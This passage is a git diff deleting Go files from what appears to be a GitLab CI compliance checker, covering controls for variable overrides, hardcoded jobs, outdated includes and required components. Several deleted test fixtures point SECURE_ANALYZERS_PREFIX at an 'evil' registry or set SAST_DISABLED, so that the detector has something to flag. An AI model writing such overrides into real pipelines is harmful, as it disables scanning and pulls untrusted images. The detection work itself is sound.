diff --git a/control/controlGitlabPipelineJobVariablesOverride_test.go b/control/controlGitlabPipelineJobVariablesOverride_test.go
deleted file mode 100644
index 6dab5ac..0000000
--- a/control/controlGitlabPipelineJobVariablesOverride_test.go
+++ /dev/null
@@ -1,244 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-func buildOriginDataForVarOverride(globalVars map[string]interface{}, jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- rawConf := &gitlab.GitlabCIConf{
- GlobalVariables: globalVars,
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- Conf: rawConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestJobVarOverride_Disabled(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: false,
- Variables: []string{"SECURE_ANALYZERS_PREFIX"},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil.example.com"},
- nil,
- )
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestJobVarOverride_NoVariablesConfigured(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil.example.com"},
- nil,
- )
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when no variables configured")
- }
-}
-
-func TestJobVarOverride_NilRawConf(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SECURE_ANALYZERS_PREFIX"},
- }
- data := &collector.GitlabPipelineOriginData{
- Conf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control not to be skipped")
- }
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when raw conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when raw conf unavailable")
- }
-}
-
-func TestJobVarOverride_GlobalVariable(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SECURE_ANALYZERS_PREFIX"},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil-registry.example.com"},
- nil,
- )
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control to run")
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- issue := result.Issues[0]
- if issue.VariableName != "SECURE_ANALYZERS_PREFIX" {
- t.Fatalf("expected variable SECURE_ANALYZERS_PREFIX, got %s", issue.VariableName)
- }
- if issue.Location != "global" {
- t.Fatalf("expected location 'global', got %s", issue.Location)
- }
- if issue.Code != CodeJobVariableOverridden {
- t.Fatalf("expected code %s, got %s", CodeJobVariableOverridden, issue.Code)
- }
- if result.Metrics.OverriddenFound != 1 {
- t.Fatalf("expected OverriddenFound 1, got %d", result.Metrics.OverriddenFound)
- }
-}
-
-func TestJobVarOverride_JobVariable(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SAST_DISABLED"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo scanning",
- "variables": map[interface{}]interface{}{
- "SAST_DISABLED": "true",
- },
- }
- data := buildOriginDataForVarOverride(
- nil,
- map[string]interface{}{"sast-job": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].Location != "sast-job" {
- t.Fatalf("expected location 'sast-job', got %s", result.Issues[0].Location)
- }
-}
-
-func TestJobVarOverride_MultipleGlobalAndJob(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SECURE_ANALYZERS_PREFIX", "SAST_DISABLED"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo test",
- "variables": map[interface{}]interface{}{
- "SAST_DISABLED": "true",
- },
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil.example.com"},
- map[string]interface{}{"scan-job": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
- if result.Metrics.OverriddenFound != 2 {
- t.Fatalf("expected OverriddenFound 2, got %d", result.Metrics.OverriddenFound)
- }
-}
-
-func TestJobVarOverride_CaseInsensitive(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"secure_analyzers_prefix"},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SECURE_ANALYZERS_PREFIX": "evil.example.com"},
- nil,
- )
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected case-insensitive match to find 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestJobVarOverride_NoMatches(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SECURE_ANALYZERS_PREFIX", "SAST_DISABLED"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "variables": map[interface{}]interface{}{
- "MY_SAFE_VAR": "hello",
- },
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SOME_VAR": "value"},
- map[string]interface{}{"build": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues, got %d", len(result.Issues))
- }
- if result.Metrics.TotalVariablesChecked < 2 {
- t.Fatalf("expected at least 2 variables checked, got %d", result.Metrics.TotalVariablesChecked)
- }
-}
-
-func TestJobVarOverride_AnyValueIsDetected(t *testing.T) {
- conf := &GitlabPipelineJobVariablesOverrideConf{
- Enabled: true,
- Variables: []string{"SAST_DISABLED"},
- }
- data := buildOriginDataForVarOverride(
- map[string]interface{}{"SAST_DISABLED": "false"},
- nil,
- )
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue even when value is 'false' (variable should not be defined at all), got %d", len(result.Issues))
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
-}
diff --git a/control/controlGitlabPipelineOriginHardcodedJobs.go b/control/controlGitlabPipelineOriginHardcodedJobs.go
deleted file mode 100644
index a60ed79..0000000
--- a/control/controlGitlabPipelineOriginHardcodedJobs.go
+++ /dev/null
@@ -1,147 +0,0 @@
-package control
-
-import (
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginHardcodedJobsVersion = "0.1.0"
-
-// GitlabPipelineHardcodedJobsConf holds the configuration for hardcoded job detection
-type GitlabPipelineHardcodedJobsConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-}
-
-// GetConf loads configuration from PlumberConfig
-// Returns error if config is nil (but control can still be disabled)
-func (p *GitlabPipelineHardcodedJobsConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- // Plumber config is required
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- // Get control config from PlumberConfig
- hardcodedConfig := plumberConfig.GetPipelineMustNotIncludeHardcodedJobsConfig()
- if hardcodedConfig == nil {
- // Control not configured - disable it
- p.Enabled = false
- return nil
- }
-
- // Apply configuration
- p.Enabled = hardcodedConfig.IsEnabled()
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- }).Debug("pipelineMustNotIncludeHardcodedJobs control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-// GitlabPipelineHardcodedJobsMetrics holds metrics about hardcoded jobs
-type GitlabPipelineHardcodedJobsMetrics struct {
- Total uint `json:"total"`
- HardcodedJobs uint `json:"hardcodedJobs"`
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabPipelineHardcodedJobsResult holds the result of the hardcoded jobs control
-type GitlabPipelineHardcodedJobsResult struct {
- Issues []GitlabPipelineHardcodedJobIssue `json:"issues"`
- Metrics GitlabPipelineHardcodedJobsMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"` // True if control was disabled
- Error string `json:"error,omitempty"` // Error message if data collection failed
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineHardcodedJobIssue represents an issue with a hardcoded job
-type GitlabPipelineHardcodedJobIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the hardcoded job detection control
-func (p *GitlabPipelineHardcodedJobsConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineHardcodedJobsResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineHardcodedJobs",
- "controlVersion": ControlTypeGitlabPipelineOriginHardcodedJobsVersion,
- })
- l.Info("Start hardcoded jobs control")
-
- result := &GitlabPipelineHardcodedJobsResult{
- Issues: []GitlabPipelineHardcodedJobIssue{},
- Metrics: GitlabPipelineHardcodedJobsMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineOriginHardcodedJobsVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- // Check if control is enabled
- if !p.Enabled {
- l.Info("Hardcoded jobs control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- // If CI is invalid or missing, return early
- if !pipelineOriginData.CiValid || pipelineOriginData.CiMissing {
- result.Compliance = 0.0
- if !pipelineOriginData.CiValid {
- result.Metrics.CiInvalid = 1
- }
- if pipelineOriginData.CiMissing {
- result.Metrics.CiMissing = 1
- }
- return result
- }
-
- // Loop over all jobs to check for hardcoded ones
- for jobName, isHardcoded := range pipelineOriginData.JobHardcodedMap {
- if isHardcoded {
- l.WithField("jobName", jobName).Debug("Found hardcoded job")
-
- issue := GitlabPipelineHardcodedJobIssue{
- Code: CodeJobHardcoded,
- DocURL: CodeJobHardcoded.DocURL(),
- JobName: jobName,
- }
- result.Issues = append(result.Issues, issue)
- result.Metrics.HardcodedJobs++
- }
- }
-
- // Calculate compliance based on issues
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Debug("Found hardcoded jobs, setting compliance to 0")
- }
-
- // Set metrics
- result.Metrics.Total = uint(len(pipelineOriginData.JobMap))
-
- l.WithFields(logrus.Fields{
- "totalJobs": result.Metrics.Total,
- "hardcodedJobsCount": result.Metrics.HardcodedJobs,
- "compliance": result.Compliance,
- }).Info("Hardcoded jobs control completed")
-
- return result
-}
diff --git a/control/controlGitlabPipelineOriginOutdated.go b/control/controlGitlabPipelineOriginOutdated.go
deleted file mode 100644
index b8534fc..0000000
--- a/control/controlGitlabPipelineOriginOutdated.go
+++ /dev/null
@@ -1,227 +0,0 @@
-package control
-
-import (
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginOutdatedVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineIncludesOutdatedConf holds the configuration for outdated includes detection
-// No specific configuration needed for outdated detection
-// The logic uses the UpToDate field from the analysis data
-type GitlabPipelineIncludesOutdatedConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineIncludesOutdatedConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- outdatedConfig := plumberConfig.GetIncludesMustBeUpToDateConfig()
- if outdatedConfig == nil {
- p.Enabled = false
- return nil
- }
-
- p.Enabled = outdatedConfig.IsEnabled()
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- }).Debug("includesMustBeUpToDate control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineIncludesOutdatedMetrics holds metrics about outdated includes
-type GitlabPipelineIncludesOutdatedMetrics struct {
- Total uint `json:"total"`
- OriginOutdated uint `json:"originOutdated"`
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabPipelineIncludesOutdatedResult holds the result of the outdated control
-type GitlabPipelineIncludesOutdatedResult struct {
- Issues []GitlabPipelineIncludesOutdatedIssue `json:"issues"`
- Metrics GitlabPipelineIncludesOutdatedMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineIncludesOutdatedIssue represents an issue with an outdated include
-// Issue data for outdated origin - PolicyIssueTypeId = [10]
-type GitlabPipelineIncludesOutdatedIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Version string `json:"version"`
- LatestVersion string `json:"latestVersion"`
- PlumberOriginPath string `json:"plumberOriginPath,omitempty"`
- GitlabIncludeLocation string `json:"gitlabIncludeLocation"`
- GitlabIncludeType string `json:"gitlabIncludeType"`
- GitlabIncludeProject string `json:"gitlabIncludeProject,omitempty"`
- Nested bool `json:"nested"`
- ComponentName string `json:"componentName,omitempty"`
- PlumberTemplateName string `json:"plumberTemplateName,omitempty"`
- OriginHash uint64 `json:"originHash"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the outdated includes detection control
-func (p *GitlabPipelineIncludesOutdatedConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineIncludesOutdatedResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineIncludesOutdated",
- "controlVersion": ControlTypeGitlabPipelineOriginOutdatedVersion,
- })
- l.Info("Start outdated includes control")
-
- result := &GitlabPipelineIncludesOutdatedResult{
- Issues: []GitlabPipelineIncludesOutdatedIssue{},
- Metrics: GitlabPipelineIncludesOutdatedMetrics{},
- Compliance: 0.0, // Start with 0%, will be set to 100 if no outdated origins found
- Version: ControlTypeGitlabPipelineOriginOutdatedVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Outdated includes control is disabled, skipping")
- result.Skipped = true
- result.Compliance = 100.0
- return result
- }
-
- // Initialize metrics
- metrics := GitlabPipelineIncludesOutdatedMetrics{}
-
- // Count CI status (max 1 as it's only one asset)
- if !pipelineOriginData.CiValid {
- metrics.CiInvalid = 1
- }
- if pipelineOriginData.CiMissing {
- metrics.CiMissing = 1
- }
-
- //////////////////////////////////
- // Check for outdated origins //
- //////////////////////////////////
-
- // Check all origins for outdated versions
- for _, origin := range pipelineOriginData.Origins {
-
- // Skip hardcoded origins - they are not "includes"
- if origin.OriginType == "hardcoded" {
- continue
- }
-
- // Count all non-hardcoded origins as includes
- metrics.Total++
-
- lOrigin := l.WithFields(logrus.Fields{
- "originType": origin.OriginType,
- "version": origin.Version,
- "location": origin.GitlabIncludeOrigin.Location,
- "upToDate": origin.UpToDate,
- "fromPlumber": origin.FromPlumber,
- "fromGitlabCatalog": origin.FromGitlabCatalog,
- })
- lOrigin.Debug("Checking origin for outdated version")
-
- // Check if origin is outdated (only for Plumber or GitLab catalog origins)
- if (origin.FromPlumber || origin.FromGitlabCatalog) && !origin.UpToDate {
-
- // Determine the appropriate latest version based on origin type
- latestVersion := ""
- plumberOriginPath := ""
- plumberTemplateName := ""
-
- if origin.FromPlumber {
- latestVersion = origin.PlumberOrigin.LatestVersion
- plumberOriginPath = origin.PlumberOrigin.Path
- plumberTemplateName = origin.PlumberOrigin.Path
- } else if origin.FromGitlabCatalog {
- latestVersion = origin.GitlabComponent.ComponentLatestVersion
- }
-
- // Extract template name from the path (just the last part after the last "/")
- templateName := plumberTemplateName
- if plumberTemplateName != "" && strings.Contains(plumberTemplateName, "/") {
- templateName = plumberTemplateName[strings.LastIndex(plumberTemplateName, "/")+1:]
- }
-
- // Extract component name from gitlabIncludeLocation if it's a component and componentName is empty
- componentName := origin.GitlabComponent.ComponentName
- if origin.GitlabIncludeOrigin.Type == "component" && componentName == "" && origin.GitlabIncludeOrigin.Location != "" {
- if strings.Contains(origin.GitlabIncludeOrigin.Location, "/") {
- componentName = origin.GitlabIncludeOrigin.Location[strings.LastIndex(origin.GitlabIncludeOrigin.Location, "/")+1:]
- }
- }
-
- // Create issue for outdated origin
- issue := GitlabPipelineIncludesOutdatedIssue{
- Code: CodeIncludeOutdated,
- DocURL: CodeIncludeOutdated.DocURL(),
- Version: origin.Version,
- LatestVersion: latestVersion,
- PlumberOriginPath: plumberOriginPath,
- GitlabIncludeLocation: origin.GitlabIncludeOrigin.Location,
- GitlabIncludeType: origin.GitlabIncludeOrigin.Type,
- GitlabIncludeProject: origin.GitlabIncludeOrigin.Project,
- Nested: origin.Nested,
- ComponentName: componentName,
- PlumberTemplateName: templateName,
- OriginHash: origin.OriginHash,
- }
-
- result.Issues = append(result.Issues, issue)
- metrics.OriginOutdated++
-
- lOrigin.Info("Outdated origin detected")
- }
- }
-
- // Set compliance: 100% if no outdated origins found, 0% otherwise
- if len(result.Issues) == 0 {
- result.Compliance = 100.0
- } else {
- result.Compliance = 0.0
- }
-
- // Update result with final metrics
- result.Metrics = metrics
-
- l.WithFields(logrus.Fields{
- "totalOrigins": metrics.Total,
- "outdatedOrigins": metrics.OriginOutdated,
- "compliance": result.Compliance,
- }).Info("Outdated includes control completed")
-
- return result
-}
diff --git a/control/controlGitlabPipelineOriginRequiredComponents.go b/control/controlGitlabPipelineOriginRequiredComponents.go
deleted file mode 100644
index cdef6a1..0000000
--- a/control/controlGitlabPipelineOriginRequiredComponents.go
+++ /dev/null
@@ -1,296 +0,0 @@
-package control
-
-import (
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/utils"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginRequiredComponentsVersion = "0.2.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineRequiredComponentsConf holds the configuration for required components check
-type GitlabPipelineRequiredComponentsConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
- // DNF (Disjunctive Normal Form) format:
- // Outer array = OR (at least one group must be satisfied)
- // Inner array = AND (all components in group must be present)
- // Example: [["comp-a", "comp-b"], ["comp-c"]] means:
- // "must have (comp-a AND comp-b) OR (comp-c)"
- RequiredGroups [][]string `json:"requiredGroups"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineRequiredComponentsConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- config := plumberConfig.GetPipelineMustIncludeComponentConfig()
- if config == nil {
- p.Enabled = false
- return nil
- }
-
- p.Enabled = config.IsEnabled()
-
- // Resolve required groups from either 'required' expression or legacy 'requiredGroups'
- groups, err := config.GetResolvedRequiredGroups()
- if err != nil {
- return err
- }
- p.RequiredGroups = groups
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "requiredGroups": p.RequiredGroups,
- "hasExpression": config.Required != "",
- }).Debug("pipelineMustIncludeComponent control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// ComponentGroupStatus tracks the status of a single requirement group (AND clause)
-type ComponentGroupStatus struct {
- GroupIndex int `json:"groupIndex"` // Which requirement group (0-based)
- RequiredOrigins []string `json:"requiredOrigins"` // Components required in this group
- FoundOrigins []string `json:"foundOrigins"` // Components found and not overridden
- MissingOrigins []string `json:"missingOrigins"` // Components missing from this group
- OverriddenOrigins []string `json:"overriddenOrigins"` // Components found but overridden with forbidden keywords
- IsFullySatisfied bool `json:"isFullySatisfied"` // All components in group present (not missing)
-}
-
-// GitlabPipelineRequiredComponentsMetrics holds metrics about required components
-type GitlabPipelineRequiredComponentsMetrics struct {
- TotalGroups uint `json:"totalGroups"` // Total number of requirement groups
- SatisfiedGroups uint `json:"satisfiedGroups"` // Number of fully satisfied groups
- AnySatisfiedGroup bool `json:"anySatisfiedGroup"` // True if at least one group satisfied
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabPipelineRequiredComponentsResult holds the result of the required components control
-type GitlabPipelineRequiredComponentsResult struct {
- RequirementGroups []ComponentGroupStatus `json:"requirementGroups"`
- Issues []RequiredComponentIssue `json:"issues"`
- OverriddenIssues []RequiredComponentOverriddenIssue `json:"overriddenIssues"`
- Metrics GitlabPipelineRequiredComponentsMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// RequiredComponentIssue represents an issue with a missing required component
-type RequiredComponentIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- ComponentPath string `json:"componentPath"`
- GroupIndex int `json:"groupIndex"`
-}
-
-// RequiredComponentOverriddenIssue represents an issue where a required component
-// is imported but its jobs are overridden with forbidden keywords
-type RequiredComponentOverriddenIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- ComponentPath string `json:"componentPath"`
- GroupIndex int `json:"groupIndex"`
- OverriddenJobs []utils.OverriddenJobDetail `json:"overriddenJobs"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the required components control
-func (p *GitlabPipelineRequiredComponentsConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData, gitlabURL string) *GitlabPipelineRequiredComponentsResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineRequiredComponents",
- "controlVersion": ControlTypeGitlabPipelineOriginRequiredComponentsVersion,
- })
- l.Info("Start required components control")
-
- result := &GitlabPipelineRequiredComponentsResult{
- RequirementGroups: []ComponentGroupStatus{},
- Issues: []RequiredComponentIssue{},
- OverriddenIssues: []RequiredComponentOverriddenIssue{},
- Metrics: GitlabPipelineRequiredComponentsMetrics{},
- Compliance: 0.0,
- Version: ControlTypeGitlabPipelineOriginRequiredComponentsVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Required components control is disabled, skipping")
- result.Skipped = true
- result.Compliance = 100.0
- return result
- }
-
- // Initialize metrics
- metrics := GitlabPipelineRequiredComponentsMetrics{}
-
- if !pipelineOriginData.CiValid {
- metrics.CiInvalid = 1
- }
- if pipelineOriginData.CiMissing {
- metrics.CiMissing = 1
- }
-
- // Initialize requirement groups
- result.RequirementGroups = make([]ComponentGroupStatus, len(p.RequiredGroups))
- for i, group := range p.RequiredGroups {
- result.RequirementGroups[i] = ComponentGroupStatus{
- GroupIndex: i,
- RequiredOrigins: group,
- FoundOrigins: []string{},
- MissingOrigins: make([]string, len(group)),
- OverriddenOrigins: []string{},
- IsFullySatisfied: false,
- }
- // Initialize all as missing
- copy(result.RequirementGroups[i].MissingOrigins, group)
- }
-
- // Check all origins against all requirement groups
- for idx := range pipelineOriginData.Origins {
- origin := &pipelineOriginData.Origins[idx]
-
- if origin.OriginType != "component" {
- continue
- }
-
- cleanComponentPath := utils.CleanOriginPath(origin.GitlabIncludeOrigin.Location)
-
- for groupIdx := range result.RequirementGroups {
- group := &result.RequirementGroups[groupIdx]
-
- for _, requiredOrigin := range group.RequiredOrigins {
- cleanRequired := utils.CleanOriginPath(requiredOrigin)
-
- if cleanComponentPath == cleanRequired {
- overriddenJobs := getOriginOverriddenJobs(origin, pipelineOriginData)
-
- if len(overriddenJobs) > 0 {
- group.OverriddenOrigins = append(group.OverriddenOrigins, requiredOrigin)
- result.OverriddenIssues = append(result.OverriddenIssues, RequiredComponentOverriddenIssue{ Code: CodeComponentOverridden,
- DocURL: CodeComponentOverridden.DocURL(), ComponentPath: requiredOrigin,
- GroupIndex: groupIdx,
- OverriddenJobs: overriddenJobs,
- })
- } else {
- group.FoundOrigins = append(group.FoundOrigins, requiredOrigin)
- }
-
- // Remove from missing list regardless of override status
- removeMissingComponent(group, requiredOrigin)
-
- l.WithFields(logrus.Fields{
- "component": requiredOrigin,
- "groupIndex": groupIdx,
- "overriddenJobs": overriddenJobs,
- }).Debug("Required component matched")
-
- break
- }
- }
- }
- }
-
- // Evaluate groups, populate issues
- anySatisfied := false
- for i := range result.RequirementGroups {
- group := &result.RequirementGroups[i]
-
- // Group is fully satisfied if no components are missing.
- // Overridden components are still "present" (imported) β they produce separate issues.
- group.IsFullySatisfied = len(group.MissingOrigins) == 0
-
- if group.IsFullySatisfied {
- anySatisfied = true
- metrics.SatisfiedGroups++
- }
-
- // Create issues for missing components
- for _, missing := range group.MissingOrigins {
- result.Issues = append(result.Issues, RequiredComponentIssue{
- Code: CodeComponentMissing,
- DocURL: CodeComponentMissing.DocURL(),
- ComponentPath: missing,
- GroupIndex: i,
- })
- }
- // Note: overridden issues are created inline during origin matching
- // so we can capture the specific forbidden keys per component
- }
-
- // Calculate metrics
- metrics.TotalGroups = uint(len(p.RequiredGroups))
- metrics.AnySatisfiedGroup = anySatisfied
-
- // Calculate compliance using DNF logic
- // Found = 100%, Overridden = 50%, Missing = 0%
- if len(p.RequiredGroups) == 0 {
- result.Compliance = 100.0
- } else {
- maxScore := 0.0
- for _, group := range result.RequirementGroups {
- totalRequired := len(group.RequiredOrigins)
- if totalRequired == 0 {
- continue
- }
-
- found := len(group.FoundOrigins)
- overridden := len(group.OverriddenOrigins)
-
- score := (float64(found) + float64(overridden)*0.5) / float64(totalRequired)
- if score > maxScore {
- maxScore = score
- }
- }
- result.Compliance = maxScore * 100.0
- }
-
- result.Metrics = metrics
-
- l.WithFields(logrus.Fields{
- "totalGroups": metrics.TotalGroups,
- "satisfiedGroups": metrics.SatisfiedGroups,
- "compliance": result.Compliance,
- "missingIssues": len(result.Issues),
- "overriddenIssues": len(result.OverriddenIssues),
- }).Info("Required components control completed")
-
- return result
-}
-
-// removeMissingComponent removes a component from the missing list by path
-func removeMissingComponent(group *ComponentGroupStatus, componentPath string) {
- cleanTarget := utils.CleanOriginPath(componentPath)
- for i := 0; i < len(group.MissingOrigins); i++ {
- cleanMissing := utils.CleanOriginPath(group.MissingOrigins[i])
- if cleanMissing == cleanTarget {
- group.MissingOrigins = append(group.MissingOrigins[:i], group.MissingOrigins[i+1:]...)
- return
- }
- }
-}
diff --git a/control/controlGitlabPipelineOriginRequiredTemplates.go b/control/controlGitlabPipelineOriginRequiredTemplates.go
deleted file mode 100644
index aaea504..0000000
--- a/control/controlGitlabPipelineOriginRequiredTemplates.go
+++ /dev/null
@@ -1,338 +0,0 @@
-package control
-
-import (
- "path"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/utils"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginRequiredTemplatesVersion = "0.2.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineRequiredTemplatesConf holds the configuration for required templates check
-type GitlabPipelineRequiredTemplatesConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
- // DNF (Disjunctive Normal Form) format:
- // Outer array = OR (at least one group must be satisfied)
- // Inner array = AND (all templates in group must be present)
- // Example: [["go", "helm"], ["go_helm_unified"]] means:
- // "must have (go AND helm) OR (go_helm_unified)"
- RequiredGroups [][]string `json:"requiredGroups"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineRequiredTemplatesConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- config := plumberConfig.GetPipelineMustIncludeTemplateConfig()
- if config == nil {
- p.Enabled = false
- return nil
- }
-
- p.Enabled = config.IsEnabled()
-
- // Resolve required groups from either 'required' expression or legacy 'requiredGroups'
- groups, err := config.GetResolvedRequiredGroups()
- if err != nil {
- return err
- }
- p.RequiredGroups = groups
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "requiredGroups": p.RequiredGroups,
- "hasExpression": config.Required != "",
- }).Debug("pipelineMustIncludeTemplate control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// TemplateGroupStatus tracks the status of a single requirement group (AND clause)
